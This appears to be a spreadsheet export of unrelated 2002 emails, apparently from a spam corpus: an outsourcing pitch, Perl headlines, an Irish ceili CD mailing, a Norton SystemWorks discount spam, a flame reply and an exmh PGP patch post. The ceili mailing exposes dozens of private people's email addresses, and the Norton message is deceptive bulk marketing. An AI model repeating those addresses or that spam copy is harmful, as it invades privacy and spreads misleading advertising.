 This will give us the chance to prove our efficiency.
 Our company's name is I.Q. Software from Bucharest, and we are
 one of the most important Romanian software companies. 
 The intense and almost exclusive cooperation with other
 foreign companies allowed us to increase our structure
 by developing new projects and systems. 
 &gt;From the begining we addressed to private companies
 as well as to public administration.
 Our projects were born in Italy, but afterwards they grew
 and shaped in Romania due to the high professionalism
 and commitment of the team that worked to bring to end
 these daring projects. 
 Our success was posible due to the excellent teamwork,
 access to the latest high performace software and last
 but not the least to the low prices for production process
 on Romanian market. 
 That is why we can confirm that the products we offer you
 are the most convenient on international market
 considering the high level of quality. 
 Here are the best examples of our abilities to meet
 the clients needs on the specific task on there main areas: 
         - software development;
         - man-power;
         - data-entry;
         - mapdrawing;
         - outsourcing.
 ********************************************************
 * So that you would be able to have an idea of our skills
   we present you some of our current projects: 
 The Situs System (Informative of Tribunals Bureaus of Supervision)
 was realized for informative administration of activities typical
 for Tribunals and Bureaus of Supervision for MINISTRY OF JUSTICE -ITALY
 (Microsoft Visual Basic 6.0, DataBase: Oracle 8.0). 
 The ICE System foresaw the resigtering of the Italian-Romanian companies
 on Romanian territory. The application is constituted by a browser which
 allows the navigation and provides some additional skills, advanced search
 on varied criterious which are created in a dynamic way by the user
 (VisualBasic 6.0, DataBase: Access 97). 
 Museum -the main request from the museum was to handle (multimedia)
 documents in specific formats on different operating system and platforms
 ( C++, HTML, CORBA IDL, ORB: Orbacus). 
 Library  (National Library of FIRENZE)- Informatical system for managing
 and labeling the ancient bibliographical materials
 (Power Builder, DataBase: Oracle). 
 Interflora - Communication and management system; consists in some
 applications and services which allows the communication between
 the flowerist man from Italy and International Association of Flowerists
 (Visual Basic 6.0). 
 Audit Office - The realization of a porting which foresaw 16 bit controls
 for substitution with 32 bit controls, introduction of new ActiveX controls,
 substitution of FORMULA 1 with native controls of VISUAL BASIC 6.0. 
 UNICO - The program foresaw the possibility of acquisition from images
 of more than 60 models of UNICO and IVA
 (fiscal declarations) - (Delphi 4.0. DataBase:SQL). 
 MINISTRY OF FINANCE - FISCAL DOCUMENTATION -The objective is
 the easy access to the Italian legislation and its consulting.
 The application based on a client/server architecture, using a network
 communication (SOCKETS) for data exchange with the server (Visual C++). 
 FOREIGN MINISTRY - ECONOMICAL APPLICATION - 
 This application is conceived as a group of projects.
                     ADMINISTRATION 
                     BALANCE-SHEETS 
                     DISPOSITIONS OF PAYMENT 
                     FOREIGN EXPENSES 
                     SYNTHETICALLY DATES 
                     SERVERS 
 (Visual Basic 6.0, DataBase: SQL Server 7.0) 
 SOGEI -  THE ADMINISTRATION OF THE CUSTOM HOUSES.
 This application is created for the financial administration of the
 peripherical offices at the customhouse (Java, HTML, DataBase: Oracle 8.0). 
 ICCREA - Application of processing development of the
 bank-procedures on mainframe(COBOL/CICS/DB2). 
 TELECOM - Microfilm Data Acquisition.
 Registering numbers and subscribers. 
 ANAGRAFICA - Acquisition from images of dates and personal information. 
 ITALIAN MINISTRY OF FINANCE - Data acquisition
 from images of medical prescription. 
 IQ REGISTER - Acquisition of information from images
 and optics archives of documentation. 
 * We had been offering for the entire Veneto Region,
   the following professional system engineers: 
 AMBIENTE BULL GCOS 8: Systematical and special assistance
 in Interel RFM, SQL, Infoedge. 
 AMBIENTE BULL/RETI: Systematical and special assistance
 of regional networks for Datanet, L.A.N., X.25,
 DSA, MAINWAY transmission, telematical networks. 
 AMBIENTE UNIX: 2 UNIX system operators with knowledge of GCOS 6. 
 * We have been offering for THE METEOROLOGY INSTITUTE OF PADOVA
   the following professional system engineers: 
 AMBIENTE DIGITAL/UNIX: Systematical and special assistance
 for DEC VAX/VMS and UNIX systems with strong enough knowledge
 of Informix and C programming. 
 AMBIENTE/DECNET/WINDOWS: Systematical and special assistance
 for DEC VAX/VMS and WINDOWS with knowledge in financial administration
 of local networks, in financial administration and configuration of
 communication systems (router, bridge, gateway, etc) and of products
 of exchange data, in financial administration and configuration of
 interface systems of Internet. 
 ********************************************************
 Therefore, to increase our presence to the international
 market we took part in the inter-governmental program
 between the United States and Romania.
 Thus, we participated to the international meeting of both
 Romanian and American IT companies on 1st November 2001 due
 to the kind initiative of both governments.
 The reason of this program, of the meeting mentioned above and of the
 initiatives that followed was to offer a new way for outsourcing, 
 more convenient than the Indian one to American software companies. 
 Our company, already present on American market, is interested to be 
 a potential partner and one of most interested in cooperating with
 American IT companies. 
 Our main interest is both on the American and European market.
 Our managing staff after visiting Italy managed to establish relations
 with this country for our curent projects. 
 On the other side a marketing tour has already been established
 in the USA in the month of May for any possible projects.
 That is why we might be able to directly discuss with you any new project.
 We'd appreciate your feed-back containing detailed contact coordinates:
 company name, address, phone and fax numbers, contact person, web-site.
           Our Area of Interest: Software Production Export
  We wish to express our availability to work under the client's brand.
 PLEASE DON'T HESITATE TO SEND US YOUR SPECIFIC INQUIRY/OFFERING DEMAND.
     We'll be happy to provide you the lowest prices in the field.
     Thanking you for your time and looking forward to your reply,
                       we wish you all the best.
 I.Q. Software Staff
 _______________________________________________
 Avfs mailing list
 Avfs@csibe.fazekas.hu
 http://www.fazekas.hu/mailman/listinfo/avfs
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dooce
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/29.html#dooce
 Date: 2002-09-29T23:40:06-05:00
 Reborn[1].
 [1] http://www.dooce.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-10-09
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Passing the Parrot Pumpkin
     posted by KM on Tuesday October 08, @09:11 (parrot)
     http://use.perl.org/article.pl?sid=02/10/08/1311237
 The Perl Journal On The Ropes
     posted by pudge on Tuesday October 08, @14:35 (links)
     http://use.perl.org/article.pl?sid=02/10/08/1835219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</si>
  <si>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'I'm just an idiot'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655707,215/
 Date: 2002-10-08T03:30:59+01:00
 *Simon Hattenstone* meets comedian Lee Evans.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?iso-8859-1?Q?Fw:_CD_Nua_do_dhamhsa=ED_Ch=E9il=ED?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_00AF_01C200E1.C5BDFF40
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ----- Original Message -----=20
 From: rathcairn=20
 To: Automail Script ; Automail Script ; astraea@iol.ie ; =C5se Tobin ; =
 araben16313168@hotmail.com ; aofarachain@tinet.ie ; =
 aofarachain@eircom.net ; Anthony Gorman ; Ann-Mari Bergkvist ; Annemarie =
 Meehan ; annemarie mcdonnell ; anne7172@arabia.com ; Anna Swelund ; Anna =
 Ni Thuama ; ann faherty ; anewloan@mail.ru ; Andy Plunkett ; Andrew =
 Delany ; Andrea Nic Oscair ; An Fhiontarlann ; amurtagh@tinet.ie ; =
 Amanda N=ED Ghuidhir ; als2@hotmail.com ; alpha@fun.21cn.com ; Allen =
 Moira ; Allen Carberry ; alex_doyle@ie.ibm.com ; Alan McGowan ; Alain =
 Civel ; Aishling N=ED Raghallaigh ; =C1ine M=E1ire N=ED Choile=E1in ; =
 AINE GUILFOYLE ; ailin.nichuir@ucd.ie ; Ail=EDn N=ED h=D3g=E1in ; Aileen =
 O'Meara, RTE ; advisor@physiciansblend.net ; adshwe@bekkers.com.au ; =
 adrian28@esatclear.ie ; Admin ; Ade Kallas ; adare productions ; =
 abqewvbgf@iinet.net.au ; aa1133777@yahoo.com ; =
 a_crothers@looksmart.com.au ; 89ok7yumhjn@msn.com ; 12unidiploma@msn.com =
 ; 0gbvll2jf@solvo.spb.su ; Daithi Mac Carthaigh ; d7596@go.ru ; =
 d23463@portugalmail.com=20
 Cc: 09886w@ams.com.br ; 0815@activate.de ; 01bb91b2.7e887960@genesys.pt =
 ; 00luke@upline.se=20
 Sent: Tuesday, May 21, 2002 3:47 PM
 Subject: CD Nua do dhamhsa=ED Ch=E9il=ED
 A chara,
 Email gairid le cur in i=FAl duit faoi Dhl=FAthdhiosca Nua at=E1 ar =
 f=E1il dona damhsa=ED Ch=E9il=ED is coitianta i measc daoine =F3ga.
 =20
 T=E1 Ceol ar dona Damhsa=ED seo a leanas :
 Balla=ED Luimn=ED
 Briseadh na Carraige
 Baint an Fh=E9ir
 Ionsa=ED na hInse
 Port an Fh=F3mhair
 Cor na S=EDog
 R=E9ic=ED Mh=E1la
 Tonna=ED Thora=ED
 Droichead =C1tha Luain
 Staic=EDn Eorna
 Se=E1in=EDn
 Cor Beirte
 Shoe the Donkey
 Waltzes=20
 agus eile
 Is f=E9idir an CD a cheannach tr=EDd www.damhsa.com
 n=F3 086 8339082
 Le meas,
 Brian =D3 Broin
 ------=_NextPart_000_00AF_01C200E1.C5BDFF40
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type&gt;
 &lt;META content=3D"MSHTML 5.00.2919.6307" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV style=3D"FONT: 10pt arial"&gt;----- Original Message -----=20
 &lt;DIV style=3D"BACKGROUND: #e4e4e4; font-color: black"&gt;&lt;B&gt;From:&lt;/B&gt; &lt;A=20
 href=3D"mailto:rathcairn@eircom.net" =
 title=3Drathcairn@eircom.net&gt;rathcairn&lt;/A&gt;=20
 &lt;/DIV&gt;
 &lt;DIV&gt;&lt;B&gt;To:&lt;/B&gt; &lt;A href=3D"mailto:nobody@tinet.ie" =
 title=3Dnobody@tinet.ie&gt;Automail=20
 Script&lt;/A&gt; ; &lt;A href=3D"mailto:nobody@eircom.net" =
 title=3Dnobody@eircom.net&gt;Automail=20
 Script&lt;/A&gt; ; &lt;A href=3D"mailto:astraea@iol.ie"=20
 title=3Dastraea@iol.ie&gt;astraea@iol.ie&lt;/A&gt; ; &lt;A =
 href=3D"mailto:aasvtobi@online.no"=20
 title=3Daasvtobi@online.no&gt;=C5se Tobin&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:araben16313168@hotmail.com"=20
 title=3Daraben16313168@hotmail.com&gt;araben16313168@hotmail.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:aofarachain@tinet.ie"=20
 title=3Daofarachain@tinet.ie&gt;aofarachain@tinet.ie&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:aofarachain@eircom.net"=20
 title=3Daofarachain@eircom.net&gt;aofarachain@eircom.net&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:anthonygorman@eircom.net" =
 title=3Danthonygorman@eircom.net&gt;Anthony=20
 Gorman&lt;/A&gt; ; &lt;A href=3D"mailto:Ann-Mari.Bergkvist@lh.luth.se"=20
 title=3DAnn-Mari.Bergkvist@lh.luth.se&gt;Ann-Mari Bergkvist&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:annemarie.meehan@barnardos.ie"=20
 title=3Dannemarie.meehan@barnardos.ie&gt;Annemarie Meehan&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:annemariemcdonnell@ireland.com"=20
 title=3Dannemariemcdonnell@ireland.com&gt;annemarie mcdonnell&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:anne7172@arabia.com"=20
 title=3Danne7172@arabia.com&gt;anne7172@arabia.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:Anna.Swelund@ericsson.com" =
 title=3DAnna.Swelund@ericsson.com&gt;Anna=20
 Swelund&lt;/A&gt; ; &lt;A href=3D"mailto:anna@glornangael.ie"=20
 title=3Danna@glornangael.ie&gt;Anna Ni Thuama&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:annfaherty@esatclear.ie" =
 title=3Dannfaherty@esatclear.ie&gt;ann faherty=20
 &lt;/A&gt;; &lt;A href=3D"mailto:anewloan@mail.ru"=20
 title=3Danewloan@mail.ru&gt;anewloan@mail.ru&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:Plunkett@gofree.Indigo.ie" =
 title=3DPlunkett@gofree.Indigo.ie&gt;Andy=20
 Plunkett&lt;/A&gt; ; &lt;A href=3D"mailto:delanya@cs.tcd.ie" =
 title=3Ddelanya@cs.tcd.ie&gt;Andrew=20
 Delany&lt;/A&gt; ; &lt;A href=3D"mailto:naiscoilardmhacha@cinni.org"=20
 title=3Dnaiscoilardmhacha@cinni.org&gt;Andrea Nic Oscair&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:fntrdan@oceanfree.net" title=3Dfntrdan@oceanfree.net&gt;An=20
 Fhiontarlann&lt;/A&gt; ; &lt;A href=3D"mailto:amurtagh@tinet.ie"=20
 title=3Damurtagh@tinet.ie&gt;amurtagh@tinet.ie&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:amandaeile@hotmail.com" =
 title=3Damandaeile@hotmail.com&gt;Amanda N=ED=20
 Ghuidhir&lt;/A&gt; ; &lt;A href=3D"mailto:als2@hotmail.com"=20
 title=3Dals2@hotmail.com&gt;als2@hotmail.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:alpha@fun.21cn.com" =
 title=3Dalpha@fun.21cn.com&gt;alpha@fun.21cn.com&lt;/A&gt;=20
 ; &lt;A href=3D"mailto:hillview@eircom.net" =
 title=3Dhillview@eircom.net&gt;Allen Moira&lt;/A&gt;=20
 ; &lt;A href=3D"mailto:acarberr@iol.ie" title=3Dacarberr@iol.ie&gt;Allen =
 Carberry&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:alex_doyle@ie.ibm.com"=20
 title=3Dalex_doyle@ie.ibm.com&gt;alex_doyle@ie.ibm.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:alan.mcgowan@kerstenhunik.ie"=20
 title=3Dalan.mcgowan@kerstenhunik.ie&gt;Alan McGowan&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:amcivel@club-internet.fr" =
 title=3Damcivel@club-internet.fr&gt;Alain=20
 Civel&lt;/A&gt; ; &lt;A href=3D"mailto:aishlingreilly@hotmail.com"=20
 title=3Daishlingreilly@hotmail.com&gt;Aishling N=ED Raghallaigh&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:sccmh@iol.ie" title=3Dsccmh@iol.ie&gt;=C1ine M=E1ire N=ED =
 Choile=E1in&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:aine.guilfoyle@NUIGALWAY.IE" =
 title=3Daine.guilfoyle@NUIGALWAY.IE&gt;AINE=20
 GUILFOYLE&lt;/A&gt; ; &lt;A href=3D"mailto:ailin.nichuir@ucd.ie"=20
 title=3Dailin.nichuir@ucd.ie&gt;ailin.nichuir@ucd.ie&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:aileenhogan@yahoo.com" =
 title=3Daileenhogan@yahoo.com&gt;Ail=EDn N=ED=20
 h=D3g=E1in&lt;/A&gt; ; &lt;A href=3D"mailto:omearaa@rte.ie" =
 title=3Domearaa@rte.ie&gt;Aileen=20
 O'Meara, RTE&lt;/A&gt; ; &lt;A href=3D"mailto:advisor@physiciansblend.net"=20
 title=3Dadvisor@physiciansblend.net&gt;advisor@physiciansblend.net&lt;/A&gt; ; &lt;A =
 href=3D"mailto:adshwe@bekkers.com.au"=20
 title=3Dadshwe@bekkers.com.au&gt;adshwe@bekkers.com.au&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:adrian28@esatclear.ie"=20
 title=3Dadrian28@esatclear.ie&gt;adrian28@esatclear.ie&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:vdkpn@jubiipost.dk" title=3Dvdkpn@jubiipost.dk&gt;Admin&lt;/A&gt; =
 ; &lt;A=20
 href=3D"mailto:ade@cut.ee" title=3Dade@cut.ee&gt;Ade Kallas&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:adare@eircom.net" title=3Dadare@eircom.net&gt;adare =
 productions&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:abqewvbgf@iinet.net.au"=20
 title=3Dabqewvbgf@iinet.net.au&gt;abqewvbgf@iinet.net.au&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:aa1133777@yahoo.com"=20
 title=3Daa1133777@yahoo.com&gt;aa1133777@yahoo.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:a_crothers@looksmart.com.au"=20
 title=3Da_crothers@looksmart.com.au&gt;a_crothers@looksmart.com.au&lt;/A&gt; ; &lt;A =
 href=3D"mailto:89ok7yumhjn@msn.com"=20
 title=3D89ok7yumhjn@msn.com&gt;89ok7yumhjn@msn.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:12unidiploma@msn.com"=20
 title=3D12unidiploma@msn.com&gt;12unidiploma@msn.com&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:0gbvll2jf@solvo.spb.su"=20
 title=3D0gbvll2jf@solvo.spb.su&gt;0gbvll2jf@solvo.spb.su&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:daithimaccarthaigh@eircom.net"=20
 title=3Ddaithimaccarthaigh@eircom.net&gt;Daithi Mac Carthaigh&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:d7596@go.ru" title=3Dd7596@go.ru&gt;d7596@go.ru&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:d23463@portugalmail.com"=20
 title=3Dd23463@portugalmail.com&gt;d23463@portugalmail.com&lt;/A&gt; &lt;/DIV&gt;
 &lt;DIV&gt;&lt;B&gt;Cc:&lt;/B&gt; &lt;A href=3D"mailto:09886w@ams.com.br"=20
 title=3D09886w@ams.com.br&gt;09886w@ams.com.br&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:0815@activate.de" =
 title=3D0815@activate.de&gt;0815@activate.de&lt;/A&gt; ; &lt;A=20
 href=3D"mailto:01bb91b2.7e887960@genesys.pt"=20
 title=3D01bb91b2.7e887960@genesys.pt&gt;01bb91b2.7e887960@genesys.pt&lt;/A&gt; ; =
 &lt;A=20
 href=3D"mailto:00luke@upline.se" =
 title=3D00luke@upline.se&gt;00luke@upline.se&lt;/A&gt;=20
 &lt;/DIV&gt;
 &lt;DIV&gt;&lt;B&gt;Sent:&lt;/B&gt; Tuesday, May 21, 2002 3:47 PM&lt;/DIV&gt;
 &lt;DIV&gt;&lt;B&gt;Subject:&lt;/B&gt; CD Nua do dhamhsa=ED Ch=E9il=ED&lt;/DIV&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;BR&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;A chara,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Email gairid le cur in =
 i=FAl duit faoi=20
 Dhl=FAthdhiosca Nua at=E1 ar f=E1il dona damhsa=ED Ch=E9il=ED is =
 coitianta i measc daoine=20
 =F3ga.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;T=E1 Ceol ar dona =
 Damhsa=ED seo a leanas=20
 :&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Balla=ED =
 Luimn=ED&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Briseadh na =
 Carraige&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Baint an =
 Fh=E9ir&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Ionsa=ED na =
 hInse&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Port an =
 Fh=F3mhair&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Cor na =
 S=EDog&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;R=E9ic=ED =
 Mh=E1la&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Tonna=ED =
 Thora=ED&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Droichead =C1tha =
 Luain&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Staic=EDn =
 Eorna&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Se=E1in=EDn&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Cor Beirte&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Shoe the =
 Donkey&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" =
 size=3D2&gt;Waltzes&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;agus eile&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Is f=E9idir an CD a =
 cheannach tr=EDd &lt;A=20
 href=3D"http://www.damhsa.com"&gt;www.damhsa.com&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;n=F3 086 =
 8339082&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Le meas,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3D"Bookman Old Style" size=3D2&gt;Brian =D3 =
 Broin&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_00AF_01C200E1.C5BDFF40--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NORTON SYSTEMWORKS CLEARANCE SALE!                9850
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"3" cellspacing=3D"3" width=3D"80%" cellpadding=3D"3" bg=
 color=3D"#800000" bordercolor=3D"#C0C0C0"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%"&gt; 
         &lt;p align=3D"center"&gt;
         &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"5" co=
 lor=3D"#FFFF00"&gt;&lt;b&gt;Norton 
           SystemWorks 2002 Software Suite&lt;br&gt;
           Professional Edition&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font size=3D"5" color=3D"#FFFFFF" face=3D"Arial, Helvetica, sans-=
 serif"&gt;6&lt;/font&gt;&lt;font size=3D"5"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif=
 " size=3D"4" color=3D"#FFFFFF"&gt; 
           Feature-Packed Utilities, &lt;/font&gt;&lt;font face=3D"Arial, Helvetica,=
  sans-serif" size=3D"4" color=3D"#000000"&gt; 
         &lt;font color=3D"#FFFFFF"&gt;1&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sa=
 ns-serif" size=3D"4" color=3D"#FFFFFF"&gt; Great Price&lt;br&gt;
           A &lt;/font&gt; &lt;font color=3D"#FFFFFF"&gt;$300.00+&lt;/font&gt;&lt;font face=3D"A=
 rial, Helvetica, sans-serif" size=3D"4" color=3D"#FFFFFF"&gt; Combined Retail=
  Value for Only &lt;/font&gt; 
           &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" color=3D"#F=
 FFFFF"&gt;$29.99!&lt;/font&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"4=
 " color=3D"#FFFFFF"&gt;&lt;br&gt;
           Includes &lt;/font&gt; &lt;font color=3D"#FFFFFF"&gt;FREE&lt;/font&gt;&lt;font face=3D=
 "Arial, Helvetica, sans-serif" size=3D"4" color=3D"#FFFFFF"&gt; Shipping!&lt;/fo=
 nt&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFFF"&gt;Don'=
 t 
         allow yourself to fall prey to destructive viruses&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;
         &lt;font face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFFF"&gt;Prot=
 ect 
         your computer and your valuable information&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#FF0000" size=3D=
 "5"&gt;
       &lt;a href=3D"http://www.youremaildeals.com/systemworks.htm" style=3D"t=
 ext-decoration: none; background-color: #FFFF00"&gt;
       &lt;font color=3D"#000000"&gt;CLICK &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;HERE&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt; 
       FOR MORE INFO AND TO ORDER&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"=
 &gt;
     ______________________________________________________________________=
 _________&lt;/font&gt;&lt;/p&gt;
     &lt;p align=3D"center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"=
 &gt;We hope you enjoy 
 receiving &lt;b&gt;Marketing Co-op&lt;/b&gt;'s special offer emails. You have received=
  this 
 special offer because you have provided permission to receive third party =
 email 
 communications regarding special online promotions or offers. However, if =
 you 
 wish to unsubscribe from this email list, please &lt;/font&gt;
 &lt;font face=3D"Tahoma" size=3D"1" color=3D"#666666"&gt;
 &lt;a href=3D"mailto:REMOVEME@btamail.net.cn"&gt;&lt;font color=3D"#FFFFFF"&gt;click h=
 ere&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#FFFFFF"&gt;. 
 Please allow 2-3 weeks for us to remove your email address. You may receiv=
 e 
 further emails from&lt;br&gt;
 us during that time, for which we apologize. Thank you.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Whore eructed:
 &gt;--]It's an amusing anecdote, I don't know if it's true or not, but
 &gt;--]certainly nothing here supports the authoritative sounding conclusion
 &gt;--]"Status: False".
 &gt;
 &gt;So thats the trick, just let any anecdotal utterances you LIKE be deemed
 &gt;true [...]
 Exsqueeze me, but what part of "I don't know if it's true or not"
 did you fail to grok?  I personally doubt it simply because I never
 heard of Bush and Chirac going to Brighton.
 Next time I hear a joke, I promise not to laugh until I have checked
 out primary sources for confirmation in triplicate, OK?  Good thing
 we have you around to keep us on the straight and narrow, all the while
 inundating us with such erudite profundities as "Kill your idols folks",
 "fight the powers that be, from with out and from with in" and innumerable
 other dippy bromides.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: exmh and pgp: support for external passphrase cache (+patch)
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 It has been signed conforming to RFC3156.
 You'll need GPG or PGP to check the signature.
 ------------=_1033130560-1199-5
 Content-Type: multipart/mixed;
  boundary="Multipart_Fri_Sep_27_14:42:27_2002-1"
 Content-Transfer-Encoding: 8bit
 --Multipart_Fri_Sep_27_14:42:27_2002-1
 Content-Type: text/plain; charset=US-ASCII
 i'm a very happy user of exmh, but i'm paranoid also :-)
 therefore i'm not too happy with exmh caching my pgp passphrases.
 usually i use a relatively secure tool called 'quintuple agent' 
 &lt;URL:http://www.vibe.at/tools/secret-agent/&gt; to store my passphrases,
 and i've just added the few lines of code to exmh which allow for such
 external caches.
 the patch is attached, it is against version 2.5-1 (debian), and the
 files modified are extrasInit.tcl and pgpExec.tcl.
 i've added three new preferences in the 'general pgp' section, which
 allow everybody to use his/her favourite external tool to get the
